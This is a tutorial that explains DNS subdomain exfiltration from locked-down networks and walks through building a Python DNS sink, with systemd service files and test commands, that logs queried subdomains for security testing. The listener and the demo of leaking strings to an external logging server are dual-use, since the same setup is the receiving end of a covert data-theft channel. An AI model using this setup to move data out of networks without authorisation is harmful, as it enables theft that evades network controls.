Introduction

DNS leaks are commonly discussed as a privacy concern when using VPNs or other privacy tools. However, the real danger lies in data exfiltration from protected environments, even those with external access locked down in and out.

The critical vulnerability is this: even if your DNS query goes to your private DNS resolver first, it eventually reaches the public internet to resolve unknown domains. If an attacker crafts a domain with a specifically configured DNS server, they can log these queries and extract sensitive data that was embedded in the subdomain.

This technique bypasses traditional network security controls because DNS traffic is typically allowed outbound, making it an ideal covert channel for data exfiltration.

Live Demonstration

You can see this technique in action right now:

Try this test:

# This will fail to resolve - you'll get "Host not found"
ping leak-test.dnsleak.lorimar.net

Or try opening this in your browser (it will fail to load) http://another-leak-test.dnsleak.lorimar.net/ or http://your-secret-data.dnsleak.lorimar.net/ or any other subdomain of “dnsleak.lorimar.net”

Now check the results: Visit http://ns.dnsleak.lorimar.net:8291/ and you’ll see leak-test logged there or whatever test string you’ve used as a hostname (even though the dns name doesn’t actually exist).

Why This Matters

This demonstrates how DNS queries reach someone’s monitoring server, allowing them to capture the subdomain portion - which could contain exfiltrated data.

This guide shows you how to build your own DNS leak detection and monitoring server to:

  • Demonstrate the vulnerability to security teams and stakeholders
  • Test network security controls and DNS filtering effectiveness

This test captures DNS queries for specific test domains and provides a simple HTTP interface to view the results in real-time.

Test Prerequisites

Before starting, ensure you have:

  • Ubuntu 20.04+ server with root access
  • Python 3.10 or higher
  • Network interface that can capture DNS traffic

How It Works

Create subdomain of yourdomain.com, e.g. dnsleaktest.yourdomain.com with NS server pointing to the server, where you are installing the script. Install the script below. Use iptables or another traffic manipulation software of your choice to re-route UDP requests coming to port 53 to sink daemon port 5353.

Installation and Setup

Step 1: Create the Python Script

Create the directory structure and install the script:

# Create application directory
sudo mkdir -p /opt/dns-monitor

# Create the Python script
sudo nano /opt/dns-monitor/dns_monitor.py

Copy the complete Python script into this file, then set proper permissions:

Click to view Python script code
#!/usr/bin/env python3
"""
DNS Subdomain Monitor — UDP proxy **sink** (no upstream, no replies, no root)
- Binds a UDP socket on a high port (default 5353)
- Parses incoming DNS queries, extracts subdomain before `dnsleaktest.yourdomain.com`
- Records uniques **in memory** and serves them via a localhost HTTP UI
- **Does not forward or reply** → external queries are silently dropped

Use with PREROUTING REDIRECT rules.
"""

import gc
import logging
import os
import re
import signal
import socket
import sys
import threading
import time
from datetime import datetime, timedelta
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from socketserver import ThreadingMixIn
from typing import Optional, Tuple

# ----------------------------- DNS helpers ----------------------------- #

def _read_labels(data: bytes, offset: int):
    """Parse DNS labels (RFC1035) with compression pointers. Returns (labels, next_offset) or (None, offset)."""
    labels = []
    jumped = False
    orig_offset = offset
    visited = 0
    while True:
        if offset >= len(data):
            return None, offset
        length = data[offset]
        if length == 0:
            offset += 1
            break
        if (length & 0xC0) == 0xC0:
            if offset + 1 >= len(data):
                return None, offset + 1
            ptr = ((length & 0x3F) << 8) | data[offset + 1]
            if visited > 8:
                return None, offset + 2
            visited += 1
            if not jumped:
                orig_offset = offset + 2
                jumped = True
            offset = ptr
            continue
        start = offset + 1
        end = start + length
        if end > len(data):
            return None, end
        labels.append(data[start:end].decode('ascii', errors='ignore'))
        offset = end
    return labels, (orig_offset if jumped else offset)


def parse_qname_from_query(pkt: bytes) -> Optional[str]:
    if len(pkt) < 12:
        return None
    qdcount = int.from_bytes(pkt[4:6], 'big')
    if qdcount < 1:
        return None
    labels, _ = _read_labels(pkt, 12)
    if not labels:
        return None
    return '.'.join(labels).lower()

# -------------------------- Custom HTTP Server ------------------------ #

class RobustHTTPServer(ThreadingHTTPServer):
    """HTTPServer with better resource management"""
    
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Set socket options for better cleanup
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # Set timeout to prevent hanging connections
        self.timeout = 30
        # Allow reuse of address
        self.allow_reuse_address = True
        # Set daemon threads to True so they don't prevent shutdown
        self.daemon_threads = True
        # Limit max threads to prevent resource exhaustion
        self.max_children = 40

class DNSMonitorHTTPHandler(BaseHTTPRequestHandler):
    """HTTP handler with better resource management"""
    
    def __init__(self, dns_monitor, *args, **kwargs):
        self.dns_monitor = dns_monitor
        # Set timeouts to prevent hanging connections
        self.timeout = 30
        super().__init__(*args, **kwargs)
    
    def do_GET(self):
        try:
            with self.dns_monitor.stats_lock:
                self.dns_monitor.stats['http_requests'] += 1
                
            self.send_response(200)
            self.send_header('Content-Type', 'text/html; charset=utf-8')
            self.send_header('Connection', 'close')  # Force connection close
            self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
            self.end_headers()
            
            content = self.dns_monitor._page_content()
            html = self._generate_html(content)
            self.wfile.write(html.encode('utf-8'))
            
        except Exception as e:
            self.dns_monitor.logger.error(f"HTTP handler error: {e}")
        finally:
            # Ensure connection is properly closed
            try:
                self.wfile.close()
            except:
                pass
   
    def _generate_html(self, content: str) -> str:
        return f"""<!DOCTYPE html><html lang='en'><head>
<meta charset='UTF-8'><meta name='viewport' content='width=device-width, initial-scale=1.0'>
<title>DNS Leak Monitor</title>
<style>body{{font-family:'Courier New',monospace;background:#1a1a1a;color:#00ff00;margin:0;padding:20px}}.container{{max-width:1200px;margin:0 auto}}.header{{background:#2d2d2d;padding:20px;border-radius:8px;margin-bottom:20px;border-left:4px solid #ff6b6b}}.disclaimer{{background:#ff6b6b;color:#fff;padding:15px;border-radius:8px;margin-bottom:20px;font-weight:bold}}.content{{background:#2d2d2d;padding:20px;border-radius:8px;white-space:pre-wrap}}h1{{color:#00ff00;margin:0 0 10px 0}}.subtitle{{color:#888;font-size:14px}}.refresh-info{{color:#ffd700;font-size:12px;text-align:right;margin-top:10px}}</style>
</head><body><div class='container'>
        <div class="disclaimer">
            ⚠️ EDUCATIONAL PURPOSE ONLY: This tool is designed for educational and authorized security testing purposes only. 
            Users must ensure they have proper authorization before monitoring any network traffic. 
            Unauthorized use may violate local laws and regulations. Use at your own risk. 
            <div class="content-section">
                    <h4>Permitted Usage</h4>
                    <ul>
                        <li>Educational research and training</li>
                        <li>Authorized security assessments</li>
                    </ul>
                </div>
                <div class="content-section">
                    <h4>Legal Requirements</h4>
                    <ul>
                        <li>Written authorization from network owners</li>
                        <li>Compliance with local privacy laws</li>
                        <li>Adherence to computer crime statutes</li>
                    </ul>
                </div>
                <div class="content-section">
                    <h4>Prohibited Activities</h4>
                    <ul>
                        <li>Unauthorized network reconnaissance</li>
                        <li>Malicious DNS traffic injection</li>
                        <li>Privacy violations or data theft</li>
                    </ul>
                </div>
            <div class="section">
                <strong>Liability Disclaimer:</strong>
                The developers, contributors, and distributors of this software disclaim all liability for damages resulting from unauthorized or improper use. Users assume full legal and financial responsibility for their actions.
            </div>
</div>
<div class='header'><h1>🔍 DNS Leak Monitor</h1>
<div class='subtitle'>Try to lookup, browse or ping any test-hostname.dnsleaktest.yourdomain.com</div>
<div class='refresh-info'>Current time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}</div></div>
<div class='content'>{content.replace('<','&lt;').replace('>','&gt;')}</div>
</div></body></html>"""
    
    def log_message(self, format, *args):
        # Suppress default HTTP logging to reduce log spam
        pass
    
    def handle_one_request(self):
        """Override to add better error handling"""
        try:
            super().handle_one_request()
        except Exception as e:
            self.dns_monitor.logger.error(f"HTTP request handling error: {e}")
        finally:
            # Force cleanup
            try:
                self.close_connection = True
            except:
                pass

# ------------------------------ Main class ----------------------------- #

class DNSMonitor:
    MAX_ENTRIES = 10  # cap in-memory growth

    def __init__(self,
                 port: int = 8291,
                 clean_interval: int = 300,
                 listen: str = "0.0.0.0:5353",
                 debug: bool = False):
        self.port = port
        self.clean_interval = clean_interval
        self.http_server = None
        self.running = False
        self.last_cleanup = datetime.now()
        self.http_restart_count = 0
        self.debug = debug

        # In-memory store: subdomain -> first_seen timestamp
        self.captured: dict[str, datetime] = {}
        self.captured_lock = threading.RLock()  # Thread-safe access
        
        # Statistics
        self.stats = {
            'dns_queries_received': 0,
            'dns_queries_parsed': 0,
            'subdomains_captured': 0,
            'http_requests': 0
        }
        self.stats_lock = threading.RLock()

        # DNS sink settings
        self.listen_host, self.listen_port = self._parse_hostport(listen, 5353)
        self.dns_sock: Optional[socket.socket] = None

        # Suffix to match and extract subdomain from
        self.target_suffix = ["dnsleaktest", "yourdomain", "com"]

        log_level = logging.DEBUG if debug else logging.INFO
        logging.basicConfig(level=log_level, format='%(asctime)s - %(levelname)s - %(message)s')
        self.logger = logging.getLogger(__name__)

    # ---------------------------- Lifecycle ---------------------------- #

    def setup_signal_handlers(self):
        def handler(signum, frame):
            self.logger.info(f"Received signal {signum}, shutting down...")
            self.cleanup(); sys.exit(0)
        signal.signal(signal.SIGINT, handler)
        signal.signal(signal.SIGTERM, handler)

    def cleanup(self):
        self.logger.info("Cleaning up...")
        self.running = False
        if self.http_server:
            try: 
                self.http_server.shutdown()
                self.http_server.server_close()
            except Exception as e: 
                self.logger.error(f"HTTP shutdown: {e}")
        if self.dns_sock:
            try: 
                self.dns_sock.close()
            except Exception: 
                pass

    # ---------------------------- In-memory store ----------------------- #

    def clear_store(self):
        with self.captured_lock:
            self.captured.clear()
            self.last_cleanup = datetime.now()
        self.logger.info("Cleared in-memory store")
        # Force garbage collection after cleanup
        gc.collect()

    def start_cleanup_timer(self):
        def worker():
            while self.running:
                try:
                    time.sleep(self.clean_interval)
                    if self.running:
                        self.clear_store()
                except Exception as e:
                    self.logger.error(f"Cleanup worker error: {e}")
        threading.Thread(target=worker, daemon=True).start()
        self.logger.info(f"Started cleanup timer (interval: {self.clean_interval} seconds)")

    def record_subdomain(self, sub: Optional[str]):
        if not sub: 
            return
        if not re.fullmatch(r"[a-z0-9_-]+", sub):
            self.logger.debug(f"Rejected invalid subdomain format: {sub}")
            return
        
        with self.captured_lock:
            if sub in self.captured:
                return
            # cap growth
            if len(self.captured) >= self.MAX_ENTRIES:
                # drop oldest
                oldest_key = next(iter(self.captured))
                self.captured.pop(oldest_key)
                self.logger.debug(f"Dropped oldest subdomain: {oldest_key}")
            self.captured[sub] = datetime.now()
        
        with self.stats_lock:
            self.stats['subdomains_captured'] += 1
        
        self.logger.info(f"Captured subdomain: {sub}")

    # ---------------------------- DNS sink ----------------------------- #

    def _parse_hostport(self, s: str, default_port: int) -> Tuple[str, int]:
        if s.startswith("[") and "]" in s:
            host, _, rest = s[1:].partition("]")
            port = int(rest[1:]) if rest.startswith(":") and rest[1:].isdigit() else default_port
            return host, port
        if ':' in s and s.count(':') == 1:
            h, p = s.split(':', 1)
            try: return h, int(p)
            except ValueError: return h or '0.0.0.0', default_port
        return (s or '0.0.0.0'), default_port

    def _extract_target_subdomain(self, qname: str) -> Optional[str]:
        labels = qname.split('.')
        if len(labels) < 4: return None
        if labels[-3:] == self.target_suffix:
            return labels[-4].lower()
        return None

    def start_dns_sink(self):
        try:
            self.dns_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            # Increase socket buffer modestly for burst tolerance
            self.dns_sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 512 * 1024)
            # Set socket timeout to prevent hanging - but longer to avoid too many timeouts
            self.dns_sock.settimeout(5.0)
            self.dns_sock.bind((self.listen_host, self.listen_port))
            self.logger.info(f"DNS sink listening on {self.listen_host}:{self.listen_port}")
        except Exception as e:
            self.logger.error(f"DNS sink startup failed: {e}")
            sys.exit(1)

        def serve():
            consecutive_errors = 0
            max_consecutive_errors = 10
            
            while self.running:
                try:
                    data, addr = self.dns_sock.recvfrom(4096)
                    consecutive_errors = 0  # Reset error counter on successful receive
                    
                    with self.stats_lock:
                        self.stats['dns_queries_received'] += 1
                    
                    # Parse & record; **do not** reply
                    try:
                        qname = parse_qname_from_query(data)
                        if qname:
                            with self.stats_lock:
                                self.stats['dns_queries_parsed'] += 1
                            
                            sub = self._extract_target_subdomain(qname)
                            if sub:
                                self.record_subdomain(sub)
                            
                            # Log all DNS queries in debug mode
                            if self.debug:
                                self.logger.debug(f"DNS query: {qname} from {addr[0]} -> subdomain: {sub}")
                        else:
                            if self.debug:
                                self.logger.debug(f"Failed to parse DNS query from {addr[0]}")
                    except Exception as e:
                        self.logger.debug(f"QNAME parse error: {e}")
                        
                except socket.timeout:
                    continue  # Normal timeout, continue loop
                except OSError as e:
                    consecutive_errors += 1
                    if self.running:
                        self.logger.error(f"DNS socket error #{consecutive_errors}: {e}")
                        if consecutive_errors >= max_consecutive_errors:
                            self.logger.error("Too many consecutive DNS errors, stopping DNS sink")
                            break
                    time.sleep(0.1)  # Brief pause before retry
                except Exception as e:
                    consecutive_errors += 1
                    self.logger.error(f"DNS receive error #{consecutive_errors}: {e}")
                    if consecutive_errors >= max_consecutive_errors:
                        self.logger.error("Too many consecutive DNS errors, stopping DNS sink")
                        break
                    time.sleep(0.1)  # Brief pause before retry
                    
        threading.Thread(target=serve, daemon=True).start()

    # --------------------------- HTTP UI with Monitoring --------------- #

    def _page_content(self) -> str:
        with self.captured_lock:
            with self.stats_lock:
                if not self.captured:
                    stats_info = (
                        f"# DNS Leak Monitor - Active since {self.last_cleanup.strftime('%Y-%m-%d %H:%M:%S')}\n"
                        f"# Statistics:\n"
                        f"#   DNS queries received: {self.stats['dns_queries_received']}\n"
                        f"#   DNS queries parsed: {self.stats['dns_queries_parsed']}\n"
                        f"#   Subdomains captured: {self.stats['subdomains_captured']}\n"
                        f"#   HTTP requests served: {self.stats['http_requests']}\n"
                        f"#   HTTP server restarts: {self.http_restart_count}\n\n"
                        "No DNS leak records captured yet.\n\n"
                        "Debug info:\n"
                        f"- Listening on {self.listen_host}:{self.listen_port}\n"
                        f"- Target suffix: {'.'.join(self.target_suffix)}\n"
                        f"- Debug mode: {'ON' if self.debug else 'OFF'}\n"
                    )
                    return stats_info
                
                next_cleanup = self.last_cleanup + timedelta(seconds=self.clean_interval)
                header = (
                    f"# DNS Leak Monitor - Active since {self.last_cleanup.strftime('%Y-%m-%d %H:%M:%S')}\n"
                    f"# Next cleanup: {next_cleanup.strftime('%Y-%m-%d %H:%M:%S')}\n"
                    f"# Statistics:\n"
                    f"#   DNS queries received: {self.stats['dns_queries_received']}\n"
                    f"#   DNS queries parsed: {self.stats['dns_queries_parsed']}\n"
                    f"#   Subdomains captured: {self.stats['subdomains_captured']}\n"
                    f"#   HTTP requests served: {self.stats['http_requests']}\n"
                    f"#   HTTP server restarts: {self.http_restart_count}\n"
                    f"# Unique domains captured: {len(self.captured)}\n"
                    f"# Captured subdomains (first-seen order):\n\n"
                )
                body = "\n".join(self.captured.keys())
                return header + body

    def start_http_server(self):
        try:
            # Create handler factory that properly binds the dns_monitor instance
            def handler_factory(*args, **kwargs):
                return DNSMonitorHTTPHandler(self, *args, **kwargs)
            
            self.http_server = RobustHTTPServer(('0.0.0.0', self.port), handler_factory)
            self.logger.info(f"HTTP UI: http://0.0.0.0:{self.port}")
            
            # Start server in a separate thread
            server_thread = threading.Thread(target=self.http_server.serve_forever, daemon=True)
            server_thread.start()
            
            # Start HTTP monitoring thread
            self.start_http_monitor()
            
        except Exception as e:
            self.logger.error(f"HTTP server failed: {e}")
            sys.exit(1)

    def start_http_monitor(self):
        """Monitor HTTP server health and restart if needed"""
        def monitor():
            last_check = time.time()
            while self.running:
                try:
                    time.sleep(60)  # Check every minute
                    current_time = time.time()
                    
                    # Check if server is still responding
                    if self.http_server and not self._is_http_healthy():
                        self.logger.warning("HTTP server appears unhealthy, restarting...")
                        self._restart_http_server()
                    
                    # Force garbage collection every 10 minutes
                    if current_time - last_check > 600:
                        gc.collect()
                        last_check = current_time
                        
                except Exception as e:
                    self.logger.error(f"HTTP monitor error: {e}")
        
        threading.Thread(target=monitor, daemon=True).start()
        self.logger.info("Started HTTP server monitor")

    def _is_http_healthy(self) -> bool:
        """Simple health check for HTTP server"""
        try:
            # Try to create a test socket connection
            test_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            test_sock.settimeout(5)
            result = test_sock.connect_ex(('127.0.0.1', self.port))
            test_sock.close()
            return result == 0
        except Exception:
            return False

    def _restart_http_server(self):
        """Restart the HTTP server"""
        try:
            if self.http_server:
                self.http_server.shutdown()
                self.http_server.server_close()
            
            # Wait a moment for cleanup
            time.sleep(2)
            
            # Force garbage collection
            gc.collect()
            
            # Restart server
            self.start_http_server()
            self.http_restart_count += 1
            self.logger.info(f"HTTP server restarted (restart #{self.http_restart_count})")
            
        except Exception as e:
            self.logger.error(f"HTTP server restart failed: {e}")

    # ------------------------------ Run -------------------------------- #

    def run(self):
        self.setup_signal_handlers()
        self.running = True
        self.clear_store()
        self.start_cleanup_timer()
        self.start_dns_sink()
        self.start_http_server()
        self.logger.info("DNS Monitor started (sink mode)")
        try:
            while self.running:
                time.sleep(1)
        except KeyboardInterrupt:
            pass
        finally:
            self.cleanup()

# ------------------------------ CLI entry ------------------------------ #

def main():
    import argparse
    p = argparse.ArgumentParser(description='DNS Subdomain Monitor (UDP sink, in-memory)')
    p.add_argument('--port', '-p', type=int, default=8291, help='HTTP server port (default: 8291)')
    p.add_argument('--clean-interval', '-i', type=int, default=900, help='In-memory cleanup interval in seconds (default: 300=5m)')
    p.add_argument('--listen', default='0.0.0.0:5353', help='DNS sink listen address:port (default: 0.0.0.0:5353)')
    p.add_argument('--daemon', '-d', action='store_true', help='Run as daemon (fork to background)')
    p.add_argument('--debug', action='store_true', help='Enable debug logging')
    args = p.parse_args()

    if args.daemon:
        try:
            pid = os.fork()
            if pid > 0:
                print(f"DNS Monitor sink started with PID: {pid}"); sys.exit(0)
        except OSError as e:
            print(f"Fork failed: {e}"); sys.exit(1)
        os.setsid(); os.chdir('/')
        with open('/dev/null', 'r') as f: os.dup2(f.fileno(), sys.stdin.fileno())
        with open('/dev/null', 'a') as f: os.dup2(f.fileno(), sys.stdout.fileno()); os.dup2(f.fileno(), sys.stderr.fileno())

    DNSMonitor(port=args.port, clean_interval=args.clean_interval, listen=args.listen, debug=args.debug).run()

if __name__ == '__main__':
    main()

Set executable permissions

sudo chmod +x /opt/dns-monitor/dns_monitor.py

Step 2: Test the Script

Before creating the service, test the script manually:

# Test basic functionality
sudo python3 /opt/dns-monitor/dns_monitor.py --help

# Run a quick test (Ctrl+C to stop)
sudo python3 /opt/dns-monitor/dns_monitor.py

In another terminal, you can test the HTTP interface:

# Check if the service is responding
curl http://localhost:8291

Creating the Systemd Service

Step 3: Service Configuration

Create user and group

if ! id dnsmon >/dev/null 2>&1; then
    sudo groupadd --system dnsmon
    sudo useradd --system --no-create-home --shell /usr/sbin/nologin --gid dnsmon dnsmon
fi

Fix ownership of your script directory

sudo chown -R dnsmon:dnsmon /opt/dns-monitor/
sudo chmod 755 /opt/dns-monitor/dns_monitor.py

Create a systemd service file:

sudo nano /etc/systemd/system/dns-monitor.service

The service configuration includes important security and reliability features:

Unit]
Description=DNS Subdomain Monitor Daemon
After=network.target
Wants=network-online.target

[Service]
Type=simple
User=dnsmon
Group=dnsmon
ExecStart=/usr/bin/python3 /opt/dns-monitor/dns_monitor.py
Restart=always
RestartSec=5
StandardOutput=journal
StandardError=journal
SyslogIdentifier=dns-monitor

# Working directory
WorkingDirectory=/opt/dns-monitor

# Environment
Environment=PYTHONUNBUFFERED=1

# Security settings
NoNewPrivileges=true
PrivateTmp=true
ProtectSystem=strict
ProtectHome=true
ProtectKernelTunables=true
ProtectKernelModules=true
ProtectControlGroups=true
RestrictRealtime=true
RestrictSUIDSGID=true
RemoveIPC=true
PrivateDevices=true

# Logging
StandardOutput=journal
StandardError=journal
SyslogIdentifier=dnsmon

[Install]
WantedBy=multi-user.target

Step 4: Enable and Start the Service

# Reload systemd configuration
sudo systemctl daemon-reload

# Enable the service to start on boot
sudo systemctl enable dns-monitor.service

# Start the service
sudo systemctl start dns-monitor.service

# Check service status
sudo systemctl status dns-monitor.service

Monitoring the Service

Use these commands to monitor your DNS monitor service:

# View real-time logs
sudo journalctl -u dns-monitor -f

# Check recent logs
sudo journalctl -u dns-monitor --since "10 minutes ago"

# View service resource usage
sudo systemctl show dns-monitor --property=MemoryCurrent,CPUUsageNSec

# Restart if needed
sudo systemctl restart dns-monitor

Testing and Validation

Step 5: Local Testing

Test your DNS leak detection server:

# 1. Verify the service is running
sudo systemctl is-active dns-monitor

# 2. Check if the port is listening
sudo netstat -tulnp | grep 8291

# 3. Test HTTP interface locally
curl http://localhost:8291

# 4. Generate test DNS queries
for i in {1..5}; do
    nslookup "test${i}.dnsleaktest.yourdomain.com" 8.8.8.8
    sleep 1
done

# 5. Check if queries were captured
curl http://localhost:8291

Remote Testing

From another machine on your network:

# Replace YOUR_SERVER_IP with actual IP
curl http://dnsleaktest.yourdomain.com:8291

# Test with telnet
telnet dnsleaktest.yourdomain.com 8291

Conclusion

This setup enables you to test for privacy leaks in your network infrastructure.